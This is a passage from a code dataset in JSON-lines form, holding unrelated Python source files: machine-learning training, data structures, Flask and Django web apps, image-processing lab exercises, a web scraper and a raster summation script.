cv2.resize(loaded_img, (150, 150))\n resized_img = (resized_img / (np.max(resized_img)/2)) - 1\n train_data[idx] = resized_img\n with open(train_labels_file, newline='') as csvfile:\n csvrdr = csv.reader(csvfile, delimiter=' ')\n for idx, r in enumerate(csvrdr):\n train_labels[idx] = int(r[0])\n\n for idx, img in enumerate(os.listdir(test_directory)):\n loaded_img = cv2.imread(test_directory + '/' + img)\n resized_img = cv2.resize(loaded_img, (150, 150))\n resized_img = (resized_img / (np.max(resized_img)/2)) - 1\n test_data[idx] = resized_img\n with open(test_labels_file, newline='') as csvfile:\n csvrdr = csv.reader(csvfile, delimiter=' ')\n for idx, r in enumerate(csvrdr):\n test_labels[idx] = int(r[0])\n train_data = train_data.astype(np.float32)\n train_labels = train_labels.astype(np.int32)\n test_data = test_data.astype(np.float32)\n test_labels = test_labels.astype(np.int32)\n\n assert not np.any(np.isnan(train_data))\n assert not 
np.any(np.isnan(train_labels))\n    assert not np.any(np.isnan(test_data))\n    assert not np.any(np.isnan(test_labels))\n\n    #print(train_data.shape)\n    #print(train_labels.shape)\n    #print(test_data.shape)\n    #print(test_labels.shape)\n\n    # DEBUG\n    #exit()\n\n    # Create the Estimator\n    tb_classifier = tf.estimator.Estimator(model_fn=cnn_model_fn, model_dir=\"./tb_cnn_model\")\n\n    # Set up logging for predictions, specifically \"probabilities\" from \"softmax\" tensor\n    tensors_to_log = {\"probabilities\": \"softmax_tensor\"}\n    logging_hook = tf.train.LoggingTensorHook(tensors=tensors_to_log, every_n_iter=50)\n\n    # Train\n    train_input_fn = tf.estimator.inputs.numpy_input_fn(\n        x={\"x\": train_data},\n        y=train_labels,\n        batch_size=10,\n        num_epochs=None,\n        shuffle=True)\n#    tb_classifier.train(\n#        input_fn=train_input_fn,\n#        steps=20000,\n#        hooks=[logging_hook])\n\n    # Test\n    eval_input_fn = tf.estimator.inputs.numpy_input_fn(\n        x={\"x\": test_data},\n        y=test_labels,\n        num_epochs=1,\n        shuffle=False)\n\n    # Results\n    eval_results = tb_classifier.evaluate(input_fn=eval_input_fn)\n    print(eval_results)\n\n    # Export\n    full_model_dir = tb_classifier.export_savedmodel(export_dir_base=\"./tb_cnn_model_serve\", serving_input_receiver_fn=serving_input_receiver_fn)\n\nif __name__ == \"__main__\":\n    tf.app.run()\n","sub_path":"CNN/tb_detect_net_barebones.py","file_name":"tb_detect_net_barebones.py","file_ext":"py","file_size_in_byte":8674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"310231901","text":"class Node:\n    def __init__(self, data):\n        self.data = data\n        self.next = None\n        self.prev = None\n\nclass doubleLinkedList:\n    def __init__(self):\n        self.head = None\n\n    def append(self, new_data):\n        if self.head is None:\n            new_data = Node(new_data)\n            self.head = new_data\n            self.head.prev = None\n        else:\n            new_data = Node(new_data)\n            current = self.head\n            while current.next:\n                current = current.next\n            current.next = new_data\n            current.next.prev = current\n            new_data.next = None\n\n    def delete_node(self, node):\n        current = self.head\n        while current:\n            # the list has only one item\n            if current == node and current == self.head:\n                if current.next is None:\n                    current = None\n                    self.head = None\n                    return\n\n                # delete the head node\n                else:\n                    nxt = current.next\n                    nxt.prev = None\n                    current.next = None\n                    current = None\n                    self.head = nxt\n                    return\n            # delete a node which isn't the last one\n            elif current == node:\n                if current.next is not None:\n                    prev = current.prev\n                    nxt = current.next\n                    prev.next = nxt\n                    nxt.prev = prev\n                    current.next = None\n                    current.prev = None\n                    current = None\n                    return\n                else:\n                    # delete the last node\n                    prev = current.prev\n                    prev.next = None\n                    current.prev = None\n                    current = None\n                    return\n            current = current.next\n\n    def removeDuplicates(self):\n        current = self.head\n        seen = {}  # hash table\n        while current:\n            if current.data not in seen:\n                seen[current.data] = 1\n                current = current.next\n            else:\n                nxt = current.next  # current is about to be deleted, so keep a handle to continue from current.next\n                self.delete_node(current)\n                current = nxt\n        #print(seen)\n\n    def print_list(self):\n        current = self.head\n        while current:\n            print(current.data)\n            current = current.next\n\nnewlist = 
doubleLinkedList()\nnewlist.append(1)\nnewlist.append(4)\nnewlist.append(4)\nnewlist.append(6)\nnewlist.append(7)\nnewlist.append(7)\nnewlist.append(9)\nnewlist.removeDuplicates()\n\nnewlist.print_list()\n\n","sub_path":"linked-lists/double-linkedlist/removeDuplicates.py","file_name":"removeDuplicates.py","file_ext":"py","file_size_in_byte":2649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"328354129","text":"# -*- coding: utf-8 -*-\nimport sys\n\nwhile True:\n\tx = input()\n\t\n\tif x == 0:\n\t\tbreak\n\n\tfor i in range(1, x + 1):\n\t\tif i != x:\n\t\t\tprint(\"%i \" % i),\n\t\t\tsys.stdout.write(\"\")\n\t\telse:\n\t\t\tprint(\"%i\" % i)","sub_path":"Uri-Online-Judge/Wellington/Python/Iniciante/1146.py","file_name":"1146.py","file_ext":"py","file_size_in_byte":195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"346135640","text":"from flask import Flask, request\nfrom flask import render_template\nimport pandas as pd\nimport numpy as np\nimport json\n#from sklearn.externals import joblib\nimport joblib\nfrom datetime import datetime, timedelta\napp = Flask(__name__)\n\n#main page\n@app.route('/')\ndef home():\n\treturn render_template('home.html')\n\n#capture the input and render the data for next html\n@app.route('/analytics',methods=['POST','GET'])\ndef analytics():\n if request.method=='POST':\n #reading the template to parse through the model\n my_df = pd.read_csv(\"Resources/user_input_df.csv\")\n result=request.form\n print(\"---------------------\")\n print(result)\n print(\"---------------------\")\n \n #get the date entered and converting to date format\n dt = result['dt']\n dt = datetime.strptime(dt, \"%Y-%m-%d\")\n \n #creating -/+3 days from the date entered by the user\n dt_more1 = dt + timedelta(days=1)\n dt_more2 = dt_more1 + timedelta(days=1)\n dt_more3 = dt_more2 + timedelta(days=1)\n\n dt_less1 = dt - timedelta(days=1)\n dt_less2 = dt_less1 - timedelta(days=1)\n dt_less3 = dt_less2 - timedelta(days=1)\n \n day = dt.day\n \n #save month from the date \n month = dt.month\n \n #save day of the week from the date\n day_of_week = dt.weekday()\n \n #get the airline from user input\n airline = result['airline']\n \n #get the origin airport from user input\n origin = result['origin']\n \n #get the destination airport from user input\n destination = result['dest']\n print(\"-----------\")\n print(destination)\n #get the departure hour from user input\n dep_hour = result['dep_hour']\n \n #create df and store the user input to the df\n columns = ['origin','destination','airline','day','month','dep_hour',]\n user_df = pd.DataFrame(columns=columns)\n print(\"before\")\n print(user_df)\n \n user_df = user_df.append({'origin': origin, 'destination': destination, 'airline':airline,\n 'day':str(day),'month':str(month), 'dep_hour':dep_hour}, ignore_index=True )\n \n print(\"after\")\n print(user_df)\n \n user_df.to_json(orient='records', path_or_buf = 'static/data/main_page_input.json')\n \n #create airline df to store airlines and prediction delay value for each airline\n columns = ['airline_code','prob_delay']\n airline_delay_df = pd.DataFrame(columns=columns)\n \n #airline list for prediction\n airline_list = ['AS', 'AA', 'US', 'DL', 'NK', 'UA', 'HA', 'B6', 'OO', 'EV', 'MQ','F9', 'WN', 'VX']\n \n #loop to check delay prediction for each airline\n for i in airline_list:\n #print(i)\n #reading the user input template to parse through the model\n my_df = 
pd.read_csv(\"Resources/user_input_df.csv\")\n \n #dt = result['dt']\n #dt = datetime.strptime(dt, \"%Y-%m-%d\")\n #month = dt.month\n my_df['MONTH_'+str(month)] = 1\n\n #day_of_week = dt.weekday()\n my_df['DAY_OF_WEEK_'+str(day_of_week)] = 1\n\n #airline = result['airline']\n #updating the model format with each airline\n my_df['AIRLINE_'+str(i)] = 1\n\n #origin = result['origin']\n my_df['ORIGIN_'+str(origin)] = 1\n\n #destination = result['dest']\n my_df['DEST_'+str(destination)] = 1\n\n #dep_hour = result['dep_hour']\n my_df['DEP_HOUR_'+str(dep_hour)] = 1\n\n #print(my_df)\n \n #loading the model\n logmodel = joblib.load('Model/Airline_Delay_Predictition_model.pkl')\n \n #check prediction for the airline for each airline\n my_df['DELAY_YN'] = logmodel.predict_proba(my_df.drop(['DELAY_YN','ARRIVAL_DELAY'],axis=1))[:,1]\n my_df['DELAY_YN'] = my_df['DELAY_YN'].apply(lambda x:(x)*100,2) \n probability_delay = (int(my_df['DELAY_YN'].values[0]*100))/100\n print(\"Probability of flight delay : \" + str(probability_delay) + \"%\")\n \n #append the airline and delay prediction to the df\n airline_delay_df = airline_delay_df.append({'airline_code': i, 'prob_delay': probability_delay}, ignore_index=True )\n \n #save the airline prediction df \n# airline_delay_df.to_json('Resources/airline_delay_prediction.json')\n airline_delay_df.to_json(orient='records',path_or_buf = 'static/data/airline_delay_prediction.json')\n \n print(airline_delay_df)\n\n #confirm the departure delay for 3+ and 3- days from the day entered by the user input\n #creating a df to store the days and prediction delay for each day\n columns = ['dep_days','prob_delay']\n dep_day_delay_df = pd.DataFrame(columns=columns)\n \n #array of total days\n days_input = [dt_less3,dt_less2,dt_less1,dt,dt_more1,dt_more2,dt_more3]\n \n #loop to check the delay prediction for each day\n for i in days_input:\n #print(i)\n \n #reading the template to parse through the model\n my_df = pd.read_csv(\"Resources/user_input_df.csv\")\n\n# dt = result['dt']\n #check the day of the week and month for each date\n dt = i\n\n# dt = datetime.strptime(dt, \"%Y-%m-%d\")\n month = dt.month\n #print(month)\n #update the user input df for the prediction model\n my_df['MONTH_'+str(month)] = 1\n\n day_of_week = dt.weekday()\n #adding 1 to the day of week to match the prediction model format\n day_of_week = day_of_week + 1\n #print(day_of_week)\n \n my_df['DAY_OF_WEEK_'+str(day_of_week)] = 1\n\n #airline = result['airline']\n my_df['AIRLINE_'+str(airline)] = 1\n\n #origin = result['origin']\n my_df['ORIGIN_'+str(origin)] = 1\n\n #destination = result['dest']\n my_df['DEST_'+str(destination)] = 1\n\n #dep_hour = result['dep_hour']\n my_df['DEP_HOUR_'+str(dep_hour)] = 1\n \n #converting the date to day to save for each day prediction\n dep_day = i.day\n #print(my_df)\n \n #loading the model\n logmodel = joblib.load('Model/Airline_Delay_Predictition_model.pkl')\n \n #predicting the delay probability\n my_df['DELAY_YN'] = logmodel.predict_proba(my_df.drop(['DELAY_YN','ARRIVAL_DELAY'],axis=1))[:,1]\n my_df['DELAY_YN'] = my_df['DELAY_YN'].apply(lambda x:(x)*100,2) \n probability_delay = (int(my_df['DELAY_YN'].values[0]*100))/100\n \n #print(\"Probability of flight delay : \" + str(probability_delay) + \"%\")\n #store the value to the df\n dep_day_delay_df = dep_day_delay_df.append({'dep_days': dep_day, 'prob_delay': probability_delay}, ignore_index=True)\n \n #save the per day departure prediction delay \n dep_day_delay_df.to_json(orient='records',path_or_buf = 
'static/data/day_delay_prediction.json')\n    print(dep_day_delay_df)\n\n    # calling the next result html\n#    return render_template('score.html', airline=airline, origin=origin, dest=destination,\n#                           prob=probability_delay, airline_delay_df=airline_delay_df, dep_day_delay_df=dep_day_delay_df)\n\n    return render_template('analytics.html')\n\nif __name__ == '__main__':\n\tapp.debug = True\n\tapp.run()","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"480261737","text":"\"\"\"\nA script that prints each article title and its link URL.\n\"\"\"\nimport requests, bs4\nres = requests.get('https://tonari-it.com')\nres.raise_for_status()\nsoup = bs4.BeautifulSoup(res.text, \"html.parser\")\nelems = soup.select('#list h2 a')\nfor elem in elems:\n    print('{} ({})'.format(elem.getText(), elem.get('href')))","sub_path":"practice/practice7.py","file_name":"practice7.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"103488272","text":"# CST205\n# Module 2: Lab 4\n# Craig Calvert\n\nimport os\n\ndef getPic():\n    return makePicture(pickAFile())\n\n# Problem 1 =====\n\n# Vertical mirror of image\ndef mirrorVrt():\n    pic = getPic()\n    for x in range(0, getWidth(pic)/2):\n        for y in range(0, getHeight(pic)):\n            color = getColor(getPixel(pic, x, y))\n            setColor(getPixel(pic, getWidth(pic)-x-1, y), color)\n    show(pic)\n\n# Horizontal mirror of image (top to bottom)\ndef mirrorHrz1():\n    pic = getPic()\n    for x in range(0, getWidth(pic)):\n        for y in range(0, getHeight(pic)/2):\n            color = getColor(getPixel(pic, x, y))\n            setColor(getPixel(pic, x, getHeight(pic)-y-1), color)\n    show(pic)\n\n# Horizontal mirror of image (bottom to top)\ndef mirrorHrz2():\n    pic = getPic()\n    for x in range(0, getWidth(pic)):\n        for y in range(getHeight(pic)/2, getHeight(pic)):\n            color = getColor(getPixel(pic, x, y))\n            setColor(getPixel(pic, x, getHeight(pic)-y-1), color)\n    show(pic)\n\n# Quadruple mirror of image\ndef mirrorQuad():\n    pic = getPic()\n    for x in range(0, getWidth(pic)/2):\n        for y in range(0, getHeight(pic)/2):\n            color = getColor(getPixel(pic, x, y))\n            setColor(getPixel(pic, getWidth(pic)-x-1, y), color)\n            setColor(getPixel(pic, x, getHeight(pic)-y-1), color)\n            setColor(getPixel(pic, getWidth(pic)-x-1, getHeight(pic)-y-1), color)\n    show(pic)\n\n# Problem 2 =====\n\ndef simpleCopy(pic):\n    newpic = makeEmptyPicture(getWidth(pic), getHeight(pic))\n    for x in range(0, getWidth(pic)):\n        for y in range(0, getHeight(pic)):\n            color = getColor(getPixel(pic, x, y))\n            setColor(getPixel(newpic, x, y), color)\n    show(newpic)\n    return newpic\n\n# Problem 3 =====\n\ndef rotate():\n    pic = getPic()\n    newpic = makeEmptyPicture(getHeight(pic), getWidth(pic))\n    newx = 1\n    for x in range(1, getWidth(pic)):\n        newy = 1\n        for y in range(1, getHeight(pic)):\n            color = getColor(getPixel(pic, x, y))\n            setColor(getPixel(newpic, newy, getWidth(pic) - newx), color)\n            newy = newy + 1\n        newx = newx + 1\n    show(newpic)\n\n# Problem 4 =====\n\ndef shrink():\n    pic = getPic()\n    newpic = makeEmptyPicture(getWidth(pic)/2, getHeight(pic)/2)\n    for x in range(0, getWidth(pic), 2):\n        for y in range(0, getHeight(pic), 2):\n            color = getColor(getPixel(pic, x, y))\n            setColor(getPixel(newpic, x/2, y/2), color)\n    show(newpic)\n\n# Method tests =====\n\ndef testProblem2():\n    rootPath = r'/Users/craigcalvert/Documents/JES/Lab 4'\n    originalPath = os.path.join(rootPath, \"testPic.jpg\")\n    originalPic = makePicture(originalPath)\n    
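# simpleCopy now hands the duplicate back (see the return added above)\n    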
originalPic = simpleCopy(originalPic)\n return\n","sub_path":"Lab 4/module2_lab4.py","file_name":"module2_lab4.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"490137166","text":"def calculate(make_float, operation, first, second, message = ''):\n if operation == 'add': value = first + second\n if operation == 'subtract': value = first - second\n if operation == 'multiply': value = first * second\n if operation == 'divide': value = first / second\n\n if make_float == True:\n value = float(value)\n else:\n value = int(value)\n\n if message != '':\n msgTxt = message + \" \" + str(value)\n else:\n msgTxt = \"The result is \" + str(value)\n\n return msgTxt\n\nprint(calculate(make_float=False, operation='add', message='You just added', first=2, second=4)) # \"You just added 6\"\nprint(calculate(make_float=True, operation='divide', first=3.5, second=5)) # \"The result is 0.7\"\n","sub_path":"Udemy/Python3Bootcamp/Functions/60_calculate.py","file_name":"60_calculate.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"9887777","text":"from flask import (\n Blueprint,\n flash,\n redirect,\n render_template,\n request,\n Response,\n session,\n url_for,\n)\n\nfrom flask_login import current_user, login_user, login_required, logout_user\n\nfrom app.models import (\n Location,\n Masterclass,\n MasterclassAttendee,\n MasterclassContent,\n User,\n db,\n)\nfrom app import gmaps\n\nmain_bp = Blueprint(\"main_bp\", __name__)\n\n\n@main_bp.route(\"/\")\n@main_bp.route(\"/index\", methods=[\"GET\"])\n@login_required\ndef index():\n masterclasses = (\n Masterclass.query.filter_by(draft=False)\n .order_by(Masterclass.timestamp.asc())\n .all()\n )\n return render_template(\n \"index.html\", title=\"Home\", user=User, masterclasses=masterclasses\n )\n\n\n@main_bp.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for(\"main_bp.index\"))\n if request.method == \"POST\":\n user = User.query.filter_by(email=request.form[\"email-address\"]).first()\n if user is None or not user.check_password(request.form[\"password\"]):\n flash(\"Invalid username or password\")\n return redirect(url_for(\"main_bp.login\"))\n login_user(\n user,\n # remember=request.form.remember_me.data\n )\n return redirect(url_for(\"main_bp.index\"))\n return render_template(\"login.html\", title=\"Sign In\")\n\n\n@main_bp.route(\"/logout\")\ndef logout():\n logout_user()\n return redirect(url_for(\"main_bp.index\"))\n\n\n@main_bp.route(\"/masterclass/\", methods=[\"GET\", \"POST\"])\n@login_required\ndef masterclass_profile(masterclass_id):\n masterclass = Masterclass.query.get(masterclass_id)\n already_attendee = MasterclassAttendee.is_attendee(current_user.id, masterclass_id)\n if request.method == \"POST\":\n new_attendee = MasterclassAttendee(\n attendee_id=current_user.id, masterclass_id=masterclass_id\n )\n db.session.add(new_attendee)\n db.session.commit()\n return redirect(\n url_for(\"main_bp.signup_confirmation\", masterclass_id=masterclass_id)\n )\n return render_template(\n \"masterclass-profile.html\",\n masterclass=masterclass,\n already_attendee=already_attendee,\n )\n\n\n@main_bp.route(\"/signup-confirmation\", methods=[\"GET\"])\n@login_required\ndef signup_confirmation():\n masterclass = Masterclass.query.get(request.args[\"masterclass_id\"])\n return 
render_template(\"signup-confirmation.html\", masterclass=masterclass)\n\n\n@main_bp.route(\"/my-masterclasses\", methods=[\"GET\"])\n@login_required\ndef my_masterclasses():\n user = current_user\n booked_masterclasses = user.get_booked_masterclasses()\n return render_template(\n \"my-masterclasses.html\", booked_masterclasses=booked_masterclasses\n )\n\n\n@main_bp.route(\"/create-masterclass\", methods=[\"GET\", \"POST\"])\n@login_required\ndef create_masterclass_start():\n if request.method == \"POST\":\n new_masterclass = Masterclass()\n db.session.add(new_masterclass)\n db.session.commit()\n session[\"draft_masterclass_id\"] = new_masterclass.id\n return render_template(\"create-masterclass/content/choose-ddat-family.html\")\n return render_template(\"create-masterclass/start.html\")\n\n\n@main_bp.route(\"/create-masterclass/content/job-family\", methods=[\"GET\", \"POST\"])\n@login_required\ndef choose_job_family():\n if request.method == \"GET\":\n return render_template(\"create-masterclass/content/choose-ddat-family.html\")\n elif request.method == \"POST\":\n chosen_job_family = request.form[\"select-job-family\"]\n session[\"job_family\"] = chosen_job_family\n existing_masterclasses = MasterclassContent.query.filter_by(\n category=chosen_job_family\n )\n return render_template(\n \"create-masterclass/content/new-or-existing.html\",\n existing_masterclasses=existing_masterclasses,\n )\n\n\n@main_bp.route(\"/create-masterclass/content/new-or-existing\", methods=[\"GET\", \"POST\"])\n@login_required\ndef choose_new_or_existing_content():\n if request.method == \"POST\":\n choice = request.form[\"which-masterclass\"]\n if choice == \"new masterclass\":\n return render_template(\"create-masterclass/content/create-new.html\")\n else:\n draft_masterclass = Masterclass.query.filter_by(\n id=session[\"draft_masterclass_id\"]\n ).first()\n draft_masterclass.masterclass_content_id = int(choice)\n db.session.add(draft_masterclass)\n db.session.commit()\n return redirect(url_for(\"main_bp.index\"))\n elif request.method == \"GET\":\n chosen_job_family = session[\"job_family\"]\n existing_masterclasses = MasterclassContent.query.filter_by(\n category=chosen_job_family\n )\n return render_template(\n \"create-masterclass/content/new-or-existing.html\",\n existing_masterclasses=existing_masterclasses,\n )\n else:\n return Response(status_code=405)\n\n\n@main_bp.route(\"/create-masterclass/content/create-new\", methods=[\"GET\", \"POST\"])\n@login_required\ndef create_new_content():\n if request.method == \"POST\":\n draft_masterclass = Masterclass.query.get(session[\"draft_masterclass_id\"])\n draft_masterclass.create_new_masterclass_content_and_attach(\n content_name=request.form[\"masterclass-name\"],\n content_description=request.form[\"masterclass-description\"],\n )\n return redirect(\n url_for(\"main_bp.index\")\n ) # TODO will take them back to task list page\n else:\n return render_template(\"create-masterclass/content/create-new.html\")\n\n\n@main_bp.route(\"/create-masterclass/location/type\", methods=[\"GET\", \"POST\"])\n@login_required\ndef choose_location_type():\n if request.method == \"POST\":\n if not request.form.get(\"location-type\"):\n return (\n render_template(\n \"create-masterclass/location/choose-location-type.html\",\n validation_error=True,\n ),\n 403,\n )\n if request.form[\"location-type\"] == \"online\":\n return redirect(url_for(\"main_bp.add_online_details\"))\n elif request.form[\"location-type\"] == \"in person\":\n return 
redirect(url_for(\"main_bp.search_for_location\"))\n else:\n return render_template(\"create-masterclass/location/choose-location-type.html\")\n\n\n@main_bp.route(\"/create-masterclass/location/online\", methods=[\"GET\", \"POST\"])\n@login_required\ndef add_online_details():\n if request.method == \"POST\":\n if not request.form.get(\"url\"):\n return (\n render_template(\n \"create-masterclass/location/online-details.html\",\n validation_error=True,\n joining_instructions=request.form.get(\"joining_instructions\"),\n ),\n 403,\n )\n draft_masterclass = Masterclass.query.get(session[\"draft_masterclass_id\"])\n draft_masterclass.set_location_details(\n data=request.form,\n is_remote=True,\n )\n return redirect(url_for(\"main_bp.index\"))\n\n return render_template(\"create-masterclass/location/online-details.html\")\n\n\n@main_bp.route(\"/create-masterclass/location/search\", methods=[\"GET\", \"POST\"])\n@login_required\ndef search_for_location():\n if request.method == \"POST\":\n if not request.form.get(\"location\"):\n return (\n render_template(\n \"create-masterclass/location/search.html\", validation_error=True\n ),\n 403,\n )\n query = request.form[\"location\"]\n results = Location.return_existing_location_or_none(query)[0:3]\n if results:\n results = [location.to_dict() for location in results]\n is_database_data = True\n else:\n results = gmaps.places(query=query)[\"results\"][0:3]\n is_database_data = False\n\n session[\"location_search_results\"] = results\n session[\"location_in_db\"] = is_database_data\n\n return redirect(url_for(\"main_bp.location_search_results\"))\n\n return render_template(\"create-masterclass/location/search.html\")\n\n\n@main_bp.route(\"/create-masterclass/location/search/results\", methods=[\"GET\", \"POST\"])\n@login_required\ndef location_search_results():\n results = session[\"location_search_results\"]\n is_database_data = session[\"location_in_db\"]\n if request.method == \"POST\":\n if not request.form.get(\"select-location\"):\n return (\n render_template(\n \"create-masterclass/location/search-results.html\",\n validation_error=True,\n results=results,\n is_database_data=is_database_data,\n ),\n 403,\n )\n draft_masterclass = Masterclass.query.get(session[\"draft_masterclass_id\"])\n location = results[int(request.form[\"select-location\"])]\n if is_database_data:\n draft_masterclass.location_id = location[\"id\"]\n else:\n new_location = Location(\n maps_id=location[\"place_id\"],\n name=location[\"name\"],\n address=location[\"formatted_address\"],\n )\n db.session.add(new_location)\n db.session.commit()\n draft_masterclass.location_id = new_location.id\n\n db.session.add(draft_masterclass)\n db.session.commit()\n\n return redirect(url_for(\"main_bp.add_in_person_location_details\"))\n\n return render_template(\n \"create-masterclass/location/search-results.html\",\n results=results,\n is_database_data=is_database_data,\n )\n\n\n@main_bp.route(\"/create-masterclass/location/details\", methods=[\"GET\", \"POST\"])\n@login_required\ndef add_in_person_location_details():\n if request.method == \"POST\":\n mandatory_fields = [\"room\", \"floor\"]\n filled_fields = [\n field for field in mandatory_fields if request.form[field] != \"\"\n ]\n if not all(field in filled_fields for field in mandatory_fields):\n return (\n render_template(\n \"create-masterclass/location/in-person-details.html\",\n validation_error=True,\n empty_fields=[\n field\n for field in mandatory_fields\n if field not in filled_fields\n ],\n form_data=request.form,\n ),\n 
403,\n )\n draft_masterclass = Masterclass.query.get(session[\"draft_masterclass_id\"])\n draft_masterclass.set_location_details(data=request.form, is_remote=False)\n return redirect(url_for(\"main_bp.index\"))\n return render_template(\"create-masterclass/location/in-person-details.html\")\n","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":10995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"2949794","text":"from maintain_frontend.services.validation.field_validator import FieldValidator\nfrom maintain_frontend.services.validation.validation_error_builder import ValidationErrorBuilder\n\n\nclass SearchReferenceValidator(object):\n @staticmethod\n def validate(reference, found=True):\n \"\"\"Specifies which validation methods should be called for each input field.\n\n\n parameters:\n - reference: Search reference\n\n returns:\n dict: A validation errors dict with the fieldname as a key and the associated validation errors in a list\n as the value.\n \"\"\"\n\n validation_error_builder = ValidationErrorBuilder()\n\n if found:\n FieldValidator(reference, 'search_reference', 'Reference', validation_error_builder,\n inline_message='Enter a search reference',\n summary_message='Enter a search reference') \\\n .is_required()\n\n FieldValidator(reference, 'search_reference', 'Reference', validation_error_builder,\n inline_message='Search reference must only include numbers 0 to 9',\n summary_message='Search reference must only include numbers 0 to 9') \\\n .is_positive_number_or_zero().is_length_less_than_or_equal_to(9)\n\n FieldValidator(reference, 'search_reference', 'Reference', validation_error_builder) \\\n .is_int()\n else:\n FieldValidator('', 'search_reference', 'Reference', validation_error_builder,\n inline_message='Search reference does not exist',\n summary_message='Search reference does not exist') \\\n .is_required()\n\n validation_errors = validation_error_builder.get()\n\n return validation_errors\n","sub_path":"maintain_frontend/view_official_search/validation/search_reference_validator.py","file_name":"search_reference_validator.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"65781788","text":"import datetime\nimport os\nimport time\nimport rasterio\nimport numpy as np\n#read in file with rasterio\ndef _read_file(file):\n print(\"reading file ...\", file)\n with rasterio.open(file) as src:\n return(src.read(1))\n\ndef monthly_sum(file_list, out_dir, out_product, year):\n# what months to summarize\n start_mon = 1 #start month\n end_mon = 12 #end month\n\n\n #loop through month 1,2,..12 \n for i in range(start_mon,(end_mon+1)): \n print('Month summed up is: ' + str(i))\n Listras = [] \n for et_in in file_list:\n doy = int(et_in.split('.')[0][-3:])\n #doy = int(et_in[-3:])\n #print 'Day of the year: ' + str(doy)\n datea = str(datetime.date(year,1,1) + datetime.timedelta(doy-1))\n mon = int(datea.split('-')[1])\n #print 'Month is: ' + str(mon)\n if mon == i: #if month = i then append grid to list for summing up\n Listras.append(et_in)\n #print('daily grids for month ' + str(i) + ' :')\n #print(Listras)\n if Listras == []:\n print('No daily data for month' + str(i) + ' available..continue to next month')\n continue\n else:\n # Read all data as a list of numpy arrays \n array_list = [_read_file(x) for x in Listras]\n \n array_out = np.sum(array_list, axis=0)\n\n # Get metadata from one of 
the input files\n            with rasterio.open(file_list[0]) as src:\n                meta = src.meta\n                meta.update(dtype=rasterio.float32)\n\n            # Write output file\n            #out_name = 'ppt_avg_' + str(year) + (('0'+ str(i))[-2:]) +'.tif'\n            out_name = out_product + str(year) + (('0'+ str(i))[-2:]) +'.tif'\n\n            with rasterio.open(out_dir + '/' + out_name, 'w', **meta) as dst:\n                dst.write(array_out.astype(rasterio.float32), 1)\n\n            print('Created monthly grid!', out_name)\n","sub_path":"pixLib/pixLib/sum_mydata.py","file_name":"sum_mydata.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"490674720","text":"from django.shortcuts import render\nfrom django.http import JsonResponse\n\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom .serializers import SubscribeSerializer\n\nfrom .models import Subscribe\n# Create your views here.\n\n@api_view(['GET'])\ndef apiOverview(request):\n\tapi_urls = {\n\t\t'List':'/subscribe-list/',\n\t\t'Create':'/subscribe-create/',\n\t\t}\n\n\treturn Response(api_urls)\n\n@api_view(['GET'])\ndef subscribeList(request):\n\tsubscribes = Subscribe.objects.all().order_by('-id')\n\tserializer = SubscribeSerializer(subscribes, many=True)\n\treturn Response(serializer.data)\n\n\n@api_view(['POST'])\ndef subscribeCreate(request):\n\tserializer = SubscribeSerializer(data=request.data)\n\n\tif serializer.is_valid():\n\t\tserializer.save()\n\n\treturn Response(serializer.data)\n\n\n\n\n","sub_path":"subscription_backend/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"554584653","text":"#!/usr/bin/env python3\n\nimport numpy as np\nimport cv2\n\n\ndef blur_image(input_filename, output_filename=None):\n    src = cv2.imread(input_filename)\n\n    src = src.astype(\"uint32\") # Prevent integer overflow when summing uint8 values\n    src = np.pad(src, ((1, 1), (1, 1), (0, 0)), mode='edge')\n\n    # Calculate average of pixels nearby, creates blur effect\n    dst = (src[1:-1, 1:-1, :] + src[:-2, 1:-1, :] + src[2:, 1:-1, :]\n           + src[1:-1, :-2, :] + src[1:-1, 2:, :] + src[:-2, :-2, :]\n           + src[2:, 2:, :] + src[:-2, 2:, :] + src[2:, :-2, :])/9\n\n    dst = dst.astype(\"uint8\") # Cast back to uint8 (fractional parts are truncated)\n    if output_filename:\n        cv2.imwrite(output_filename, dst)\n\n    return dst\n\n\nif __name__ == \"__main__\":\n    blur_image(\"../images/beatles.jpg\")\n","sub_path":"assignment4/blur/blur_image.py","file_name":"blur_image.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"293153250","text":"class GoogleCloudStorage:\n    def __init__(self, bucket, regexp, credentials):\n        self.bucket = bucket\n        self.regexp = regexp\n        self.credentials = credentials\n\n    def resource_type(self):\n        return {\n            \"name\": \"gcs\",\n            \"type\": \"docker-image\",\n            \"source\": {\n                \"repository\": \"frodenas/gcs-resource\",\n                \"tag\": \"latest\",\n            },\n        }\n\n    def get(self, name):\n        return self\n\n    def concourse(self, name):\n        result = {\n            \"name\": name,\n            \"type\": \"gcs\",\n            \"icon\": \"file-cloud\",\n            \"source\": {\n                \"bucket\": self.bucket,\n                \"regexp\": self.regexp,\n                